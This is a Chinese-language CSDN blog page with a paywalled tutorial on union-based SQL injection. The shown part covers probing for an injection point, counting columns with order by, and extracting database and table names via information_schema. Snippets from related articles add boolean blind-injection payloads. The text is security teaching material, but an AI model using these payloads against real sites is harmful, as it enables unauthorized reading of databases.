WEB安全原理(1)——SQL注入

最新推荐文章于 2023-07-11 16:00:52 发布
VIP文章 最新推荐文章于 2023-07-11 16:00:52 发布
阅读量564 收藏 3
点赞数 1
文章标签: sql 数据库 mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuluotianjin/article/details/119859789
版权

WEB安全原理(1)——SQL注入

1.Union注入

如果通过sql注入,页面上能获取预期信息,则可使用Union注入。
(1)判断是否存在注入点(区分下是数字型注入还是字符型注入

id=1 # 正常回值
id=1' # 异常回值

id=1 and 1=1 # 正常回值
id=1 and 1=2 # 异常回值

(2)判断表中的字段数

id=1 order by [1,2,3,……]

使用order by语句,后面跟随具体数字,这些数字可用于指代表中字段名,观察数字从1开始递增到哪个数字为止,界面回值均会正常,则那个终止的数字则为字段数。
(3)观察表中哪些字段能够回显数据到前端页面上

id=-1 union select 1,2,3,…… # select接所有字段

上述语句中由于union前面语句显然错误,则页面上只会回显union的查询结果。然后根据页面上的回显数字,就可以知道哪几个字段可以回显数据到前端页面上。
(4)获取当前数据库名

id=-1 union select 1,database(),2,3,……

在可以回显数据的字段位置上,替换为database()函数,这样页面便会在该字段位置上显示当前数据库名。
(5)通过已知的数据库名,获取该数据库下的表名

id=-1 union select 1,(select table_name from information_schema.tables where table_schema='test' limit 0,1),2,3,…… # limit 0,1 指从返回的结果中从第一条记录开始,取一条记录

(6)通过已知的表名,获取表中的字段名

id=-1 union select 1
最低0.47元/天 解锁文章
颜桓君
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入练习之bool盲注
windStudyer的专栏
05-22 1097
1.bool盲注的原理 以根据返回页面判断条件真假的注入 判断方式: 通过长度判断 length(): length(database())>=x 通过字符判断 substr():substr(database() ,1,1)= 's' 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x 2.bool盲注相关的函数 3.实验-bool盲注 实验环境:phpstudy+apache+mysql+pikachu 3.1判断注入点
SQL注入学习记录一
一只菜鸡
02-22 703
前置知识: 1.mysql数据库的一些基本使用:增删改查 2.python脚本的使用 3.了解php常见的与mysql相关的函数和类 0x01:数据库基础 1.基础操作 查看库名: mysql> show databases; 创建库: mysql> creat database test; 删除库: mysql> drop database test; 使用库: mysql> user test 创建表: mysql> create table test( -> `i
字符串截取
qq_42129143的博客
05-22 238
1、slice() 第一个参数是开始位置,第二个参数是结束位置的后一位,截取出来的字符串长度是第二个参数和第一个参数的差, 如果参数是负数,则将该值加上字符串长度转为正值,如果第一个参数大于第二个参数,返回空字符串2、substring 第一个参数是开始位置,第二个参数是结束位置的后一位,截取出来的字符串长度是第二个参数与第一个参数的差 如果参数是负数,则将该值转换...
关于SQL的各种注入
qq_73607577的博客
03-24 1557
SQL注入
sql注入手法详解
m0_71299382的博客
11-26 1万+
sql注入总结
SQL注入原理-字符型注入
T1ngSh0w的博客
09-13 8199
SQL注入原理-字符型注入
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我之前的文章有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffixandprefix)注入到数据库。本文将更进一步,讨论SQL...
机器学习实现web攻击检测——XSS、SQL注入Webshell检测.zip
最新发布
05-06
机器学习实现web攻击检测——XSS、SQL注入Webshell检测.zip
预防XSS攻击和SQL注入XssFilter
05-19
XSS是一种经常出现在web应用的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin...
WEB入侵消灭在萌芽之——预防SQL注入
08-24
尽管这会对广大的运维人员和安全工作者造成很大的工作压力,但是我们相信通过持续不断地执行并改进相关安全措施,可以最大限度地保障Web应用的安全,将关键系统可能发生的风险控制在可接受的范围之内。
mysql数据库sql注入各种函数必须知道的知识
weixin_44286136的博客
05-20 508
数据库名:database() 数据库版本: version() 数据库用户: user() 操作系统: @@version_compile_os 系统用户名: system_user() 当前用户名: current_user 连接数据库的用户名:session_user() 读取数据库路径:@@datadir MYSQL安装路径:@@basedir 储存所有表名信息的表 : information_schema.tables 表名 : table_name 数据库名: table_schema 列名 :
SQL注入学习笔记
weixin_45730269的博客
03-29 155
那么,rand()函数存在一定的随机性,所以group by后面的值两次计算结果可能不一致,但是这个运算的结果可能在虚拟表已经存在了,那么这时候吧值插入到虚拟表就会导致主键重复,进而引发错误。一个GBK编码汉字,占用2个字节:一个UTF-8编码的汉字,占用3-4个字节当Web应用程序的编码方式为GBK,而数据库的编码方式为UTF-8,且WAF利用AddSlashes0等函数对敏感字符进行转义时,此时可以利用Web应用程序和数据库编码方式上的差异,想办法将,前面添加的转义符一除掉,以实现注入。
SQL注入盲注基础
m0_62177883的博客
07-26 1635
如下,就取出了username下的全部数据内容这里,可以在2的位置写上username,3的位置写上password,就可以的到全部数据?指在SQL注入的过程,找到注入点后,执行SQL语句后,选择的数据或者错误信息不能回显到前端页面。这里需要利用一些方法进行判断或者猜测,这个过程称之为盲注。第八关就用到盲注的方法。因为当输入?id=1时,出现的是只有两种显示,输入正确的语句,就显示youarein......,输入错误的东西,就不显示内容。.....................
SQL注入详解(全网最全,万字长文)
热门推荐
m0_56691564的博客
10-23 3万+
一些概念:SQL:用于数据库的标准数据查询语言。 web分为前端和后端,前端负责进行展示,后端负责处理来自前端的请求并提供前端展示的资源。而数据库就是存储资源的地方。而服务器获取数据的方法就是使用SQL语句进行查询获取。
sql注入详解
m0_67392811的博客
06-12 5408
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互,前端的数据传入到后台处理时,没
sql server 从左侧截取不固定长度_sql盲注布尔注入
weixin_39890289的博客
12-09 181
sql盲注:从执行结果上无法从页面上看到之行结果无法分析sql执行过程,甚至无法得知是否运行盲注相对复杂一.在安全级别为LOW基于布尔的盲注-注入点及类型判断1.php代码分析先检查一下User Id 是否为空,如果为空执行下列操作,先赋值id,之后再数据库查询数据,将结果输出给result,将结果集行的数量,如果大于0,输出User ID存在数据库,否则发送数据包头并输出不存在数...
布尔盲注练习
weixin_60777183的博客
08-27 232
盲注需要掌握的几个函数: 1.length() 判断字符串的长度 举例:and length(database())>1 2.substr() 截取字符串的函数 格式:substr(str,pos,len) substr(字符串内容,从哪里切,切多长) 可用于:and substr(database(),1,1)=’a’ 来判断数据库的第一位是否为a 3.ascii() 返回字符的asc码 加入ascii码判断,可改为: ?id=1 and ascii(substr(database(),
sql注入-union注入】 union函数 联合注入
07-11 7069
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
sql注入详细过程
qq_42890862的博客
06-30 5789
mysql mysql5.0以上版本包含内置的information_schema数据库,它储存着mysql所有的数据库和表结构信息,利用该数据库可以查询到所有的数据库和表的内容 5.0 暴力破解的方式获取数据 1.原理 当我们的Web app在向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库的数据。 2.sql手工注入的基本思路 (1)找到注入点 在我们可控的输入部分加一些符号,查看页
sql注入内联注释原理
08-10
- *1* [Web安全原理剖析(一)——SQL注入原理](https://blog.csdn.net/qq_25505167/article/details/120063391)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值